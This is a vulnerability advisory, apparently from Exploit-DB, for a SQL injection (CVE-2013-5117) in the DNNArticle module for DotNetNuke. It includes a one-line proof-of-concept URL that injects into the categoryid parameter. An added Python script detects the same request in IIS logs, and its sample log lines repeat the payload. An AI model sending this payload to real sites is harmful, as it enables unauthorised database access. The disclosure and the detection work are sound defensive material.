DotNetNuke DNNArticle Module 10.0 – SQL Injection

  • Author: Sajjad Pourali
    Date: 2013-08-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/27602/
  • Title: DotNetNuke (DNNArticle Module) SQL Injection Vulnerability
    References: CVE-2013-5117
    Discovered by: Sajjad Pourali
    
    Vendor: http://www.zldnn.com/, http://www.dnnarticle.com/
    Vendor advisory: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket ID: #2979)
    Vendor contact: 2013-8-14
    
    Solution: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket ID: #2979)
     
    Remote: yes
    Authentication required: no
    User interaction required: no
    Impact: High
     
    Affected:
    
     - DNNArticle 10.0 and earlier
    
    ---
    
    PoC:
    
    http://server/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version
     
    ---
     
     + Sajjad Pourali
     + http://www.securation.com/
     + http://www.cert.um.ac.ir/
     + Contact: sajjad[at]securation.com
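
For triage on a site running an affected version, the request shape in the PoC can be searched for in web server logs. The script below is an added example, not part of the original advisory or the vendor's code: it flags requests to `dnnarticlerss.aspx` whose `moduleid` or `categoryid` is not a plain integer. It assumes that both parameters are meant to be integers (inferred from the PoC values) and that logs are IIS W3C format with a `#Fields:` header; the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl

ENDPOINT = "/desktopmodules/dnnarticle/dnnarticlerss.aspx"  # path from the PoC URL
INT_PARAMS = {"moduleid", "categoryid"}  # assumed integer-only (see lead-in)
INT_RE = re.compile(r"-?\d{1,10}")

def non_integer_params(stem, query):
    """Return [(param, decoded_value)] for integer parameters holding other data."""
    if stem.lower() != ENDPOINT:  # IIS paths are case-insensitive
        return []
    hits = []
    # parse_qsl decodes %xx and '+', so encoded input is normalised before the check.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() in INT_PARAMS and not INT_RE.fullmatch(value):
            hits.append((key.lower(), value))
    return hits

def scan_iis_log(lines):
    """Yield (client_ip, param, value) for flagged requests in a W3C log."""
    fields = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        query = row.get("cs-uri-query", "-")
        query = "" if query == "-" else query  # IIS writes '-' for an empty query
        for param, value in non_integer_params(row.get("cs-uri-stem", ""), query):
            yield row.get("c-ip", "-"), param, value

# Constructed sample log (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2013-08-16 10:00:01 GET /desktopmodules/dnnarticle/dnnarticlerss.aspx moduleid=381&categoryid=12 192.0.2.10 200
2013-08-16 10:00:07 GET /DesktopModules/DNNArticle/DNNArticleRSS.aspx moduleid=0&categoryid=1+or+1=@@version 198.51.100.7 500
2013-08-16 10:00:09 GET /desktopmodules/dnnarticle/dnnarticlerss.aspx moduleid=381&categoryid=1%20or%201%3D%40%40version 198.51.100.7 500
2013-08-16 10:00:15 GET /default.aspx tabid=55 192.0.2.10 200
""".splitlines()

if __name__ == "__main__":
    for client_ip, param, value in scan_iis_log(SAMPLE_LOG):
        print(f"{client_ip}: {param}={value!r}")
```

The same integer-only check can be applied as a request filter in front of the module until the vendor fix referenced under "Solution" is installed.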